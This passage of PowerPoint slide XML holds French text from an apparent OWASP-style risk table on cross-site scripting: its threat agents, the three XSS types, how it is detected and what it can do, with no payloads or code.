                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>fiable</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> au </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>système</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>compris</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>utilisateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>externes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, internes et </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>adminstrateurs</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’attaquant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>envoie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des scripts qui </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>exploitent</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’interpréteur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>dans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>navigateur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Toute</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> source de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>donnée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>être</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> un </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vecteur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’attaque</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>compris</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des sources internes </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>telles</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>que</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> les </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>données</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>d’une</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> base interne.</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just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>XSS</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> est la faille la plus répandue dans les application web. Les failles XSS ont lieu lorsqu’une application inclut des données fournies par l’utilisateur dans une page envoyée au navigateur, sans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>validation ou échappement correct</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>de ce contenu. il en  existe trois types connus: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>1)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Stockée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> 2)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>Réfléchie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>et 3)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t> XSS </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>basée</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>sur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t> DOM</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1000" kern="1200" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>La détection de la plupart des failles XSS est assez simple par test ou analyse de code.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="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marL="0" marR="0" indent="0" algn="just" defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>L’attaquant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>peut</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>exécuter</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des scripts </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>dans</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> le </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>navigateur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> de la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>victime</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> pour </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>détourner</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des sessions, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>défigurer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> des sites, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>insérer</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> du </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>contenu</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> hostile, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>rediriger</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>l’utilisateur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>vers</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> un site </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>malveillant</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, etc.</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defTabSz="914400" rtl="0" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Considérez</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>valeur</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> métier du </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>système</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>concerné</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>ainsi</a:t>
                      </a:r>
